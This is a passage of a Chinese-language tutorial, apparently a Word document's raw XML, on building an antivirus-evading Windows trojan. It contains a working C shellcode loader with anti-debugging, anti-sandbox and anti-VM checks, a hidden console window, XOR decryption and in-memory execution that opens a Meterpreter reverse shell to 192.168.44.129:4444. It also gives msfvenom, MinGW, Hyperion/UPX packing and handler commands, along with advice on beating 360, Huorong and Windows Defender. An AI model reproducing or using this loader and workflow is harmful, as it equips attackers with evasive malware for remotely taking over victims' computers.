x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,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0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,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0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,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0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,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0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,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0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,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0x63,0x00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};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// XOR解密函数（密钥必须与生成Shellcode时的--encrypt-key一致，此处为"msf2025"，不可修改）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void xor_decrypt(unsigned char *data, size_t len, const char *key) {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size_t key_len = strlen(key);  // 获取密钥长度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for (size_t i = 0; i &lt; len; i++) {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    data[i] ^= key[i % key_len];  // 循环异或解密，确保所有Shellcode都能解密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}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}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// 反调试检测（若有调试器附加，立即退出，避免被杀软分析）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BOOL IsDebugger() {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return IsDebuggerPresent();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}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// 反沙箱检测（检测CPU核心数，沙箱通常1-2个核心，真实机器一般≥4个）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BOOL IsSandbox() {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SYSTEM_INFO si;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GetSystemInfo(&amp;si);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if (si.dwNumberOfProcessors &lt; 4) {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    return TRUE;  // 核心数&lt;4，判定为沙箱，立即退出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}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return FALSE;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}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// 反虚拟机检测（检测注册表中VMware标识，避免在虚拟机/沙箱中暴露恶意逻辑）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BOOL IsVM() {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char buf[512];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HKEY hKey;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// 检测注册表中是否有VMware虚拟机的标识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if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", 0, KEY_READ, &amp;hKey) == ERROR_SUCCESS) {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    DWORD type, sz = sizeof(buf);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    RegQueryValueExA(hKey, "Identifier", NULL, &amp;type, (LPBYTE)buf, &amp;sz);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    RegCloseKey(hKey);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    // 若注册表中包含"VMware"，说明在虚拟机（沙箱）中，返回真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    return strstr(buf, "VMware") != NULL;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}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return FALSE;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}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// 主函数（程序入口，核心执行逻辑）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int main() {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// 反沙箱/反调试/反虚拟机检测：只要满足一个条件，立即退出，避免被检测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if (IsDebugger() || IsSandbox() || IsVM()) { ExitProcess(0); }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// 隐藏控制台窗口：运行后不显示黑窗口，降低靶机用户警惕性，避免被发现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HWND hWnd = GetConsoleWindow();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ShowWindow(hWnd, SW_HIDE);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// 解密Shellcode（密钥与生成Shellcode时的--encrypt-key一致，必须是"msf2025"）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const char *key = "msf2025";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xor_decrypt(shellcode, sizeof(shellcode), key);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// 申请可执行内存：为解密后的Shellcode申请内存，权限为"可执行、可读、可写"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LPVOID mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);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if (mem == NULL) return 1;  // 内存申请失败，直接退出程序，避免报错暴露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// 复制Shellcode到申请的内存中，准备执行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memcpy(mem, shellcode, sizeof(shellcode));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// 执行Shellcode（触发反向连接，连接Kali攻击机192.168.44.129:4444）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((void(*)())mem)();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 xml:space="preserve">    return 0;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}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      ④ 打开shellcode.h文件，复制其中的十六进制数组：执行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nano shellcode.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，打开后会看到类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>unsigned char shellcode_raw[] = {0xfc,0x48,...};</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的内容（数组名可能是shellcode_raw，无需修改数组名），选中整个数组（从{开始，到}结束，包括里面的所有十六进制数值和逗号），复制（快捷键：Ctrl+Shift+C）。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      ⑤ 替换loader.c中的示例数组：回到loader.c的nano编辑器，找到开头的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>unsigned char shellcode[] = {...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，选中整个示例数组（从{到}），粘贴刚才复制的shellcode.h中的数组（快捷键：Ctrl+Shift+V），完成替换（替换后，数组内容与shellcode.h中的完全一致，无需修改其他内容）。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      ⑥ 保存并退出loader.c：替换完成后，按下快捷键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Ctrl+O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（保存），然后按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确认保存，最后按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Ctrl+X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>退出nano编辑器，此时loader.c文件已创建完成，且已嵌入加密后的Shellcode，同时包含反沙箱、反调试功能。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⑦ 检查加载器文件：执行命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，若能看到loader.c文件，说明步骤执行成功，可进入下一步编译操作。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      注意事项：1. 替换数组时，务必完整复制shellcode.h中的数组，不要遗漏任何一个字符、逗号或括号，否则会导致编译失败；2. 密钥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"msf2025"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>必须与生成Shellcode时的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>--encrypt-key "msf2025"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一致，不可修改，否则解密失败，木马无法运行；3. 若复制粘贴时出现格式错乱，重新复制粘贴即可，确保代码无语法错误。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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B9DD41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MinGW交叉编译加载器，剥离符号、优化代码：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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>x86_64-w64-mingw32-gcc loader.c -o loader.exe -s -w -O2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC2B8CF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使用Hyperion/UPX加壳（推荐Hyperion，免杀效果更好）：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 xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t># Hyperion加壳（需提前下载Hyperion，命令参考）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>./Hyperion.exe loader.exe loader_hyperion.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D876C6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Virustotal验证检测率，若过高，调整编码次数、密钥、加壳参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59023B7A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启动MSF监听，靶机运行加壳后的木马，确认能正常回连。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B65B9F8">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="heading_31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>六、常见问题与注意事项（避坑关键）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="0873EAE3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编码次数过多（&gt;20）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：会导致Shellcode体积过大、解码失败，程序无法运行，建议控制在10-15次，兼顾免杀效果和程序稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22D136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单纯UPX加壳</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：极易被360、火绒、Windows Defender查杀，UPX仅作为辅助，必须配合编码+加载器使用，优先选择Hyperion等加密壳。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2086BCF1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反向连接失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：检查3点：① Kali防火墙是否关闭（执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ufw disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；② 靶机与Kali是否在同一局域网（IP段一致：192.168.44.x）；③ 监听端口（4444）是否被占用（执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>netstat -tuln | grep 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，若占用，更换端口）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C47CF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免杀时效性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：杀软病毒库会持续更新，今天能免杀的木马，明天可能就会被查杀，需定期调整免杀方案（更换编码方式、加密密钥、加壳工具）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE2EFF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加载器编译失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：检查MinGW是否安装成功，代码是否有语法错误（重点检查Shellcode数组是否复制完整、密钥是否一致）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378691E">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="heading_32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>七、常用命令汇总（快速复制，方便操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32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5B00327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6681C4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1. 环境准备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sudo apt update &amp;&amp; sudo apt install metasploit-framework mingw-w64 upx -y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ip a  # 验证IP为192.168.44.129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2. 生成加密Shellcode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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -e x86/shikata_ga_nai -i 15 --encrypt xor --encrypt-key "msf2025" -f raw -o shellcode.raw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xxd -i shellcode.raw &gt; shellcode.h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3. 编译加载器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x86_64-w64-mingw32-gcc loader.c -o loader.exe -s -w -O2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4. UPX加壳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upx -9 loader.exe -o loader_upx.exe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5. MSF监听（固定命令）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msfconsole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use exploit/multi/handler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set PAYLOAD windows/x64/meterpreter/reverse_tcp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set LHOST 192.168.44.129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set LPORT 4444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run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="138C5D87">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="33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A13F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8DEF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845B5372"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="845B5372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2">
    <w:nsid w:val="8461FADE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8461FAD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8CAEB125"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8CAEB1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91995D4F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="91995D4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9C8AC8EF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9C8AC8E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B5E306ED"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5E306E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0">
    <w:nsid w:val="B8CEF35B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B8CEF35B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1">
    <w:nsid w:val="BB64CFA9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BB64CFA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2">
    <w:nsid w:val="BE923771"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BE9237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BF205925"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF20592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D7F9FE59"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D7F9FE5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7">
    <w:nsid w:val="DCBA6B53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DCBA6B53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8">
    <w:nsid w:val="E093A4B0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E093A4B0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9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F7735DC9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7735DC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1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03D62ECE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03D62ECE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4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1ACDE60F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1ACDE60F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26">
    <w:nsid w:val="243FCF68"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="243FCF6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7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8">
    <w:nsid w:val="25B654F3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="25B654F3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9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30FC5B15"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="30FC5B1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1">
    <w:nsid w:val="322D85CA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="322D85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2">
    <w:nsid w:val="39A0D9AC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="39A0D9A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3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4">
    <w:nsid w:val="4C1BAE26"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C1BAE2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5">
    <w:nsid w:val="4C3D7A74"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C3D7A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6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7">
    <w:nsid w:val="4D94DA66"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4D94DA6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8">
    <w:nsid w:val="58765686"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5876568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9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0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1">
    <w:nsid w:val="5E29AB5A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5E29AB5A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42">
    <w:nsid w:val="5FFFB1A7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5FFFB1A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3">
    <w:nsid w:val="60382F6E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="60382F6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4">
    <w:nsid w:val="629F7852"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="629F78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5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6">
    <w:nsid w:val="74C28B35"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="74C28B3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7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8">
    <w:nsid w:val="79AA4FA4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="79AA4FA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9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0">
    <w:nsid w:val="7DEC2089"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7DEC208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21"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="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102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1095</Words>
  <Characters>1396</Characters>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1420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2026-04-23T06:25:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>萧泽亮</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-23T06:26:50Z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964FA9CCBFDA4138B39A0E71F80CC250_13</vt:lpwstr>
  </property>
</Properties>
</file>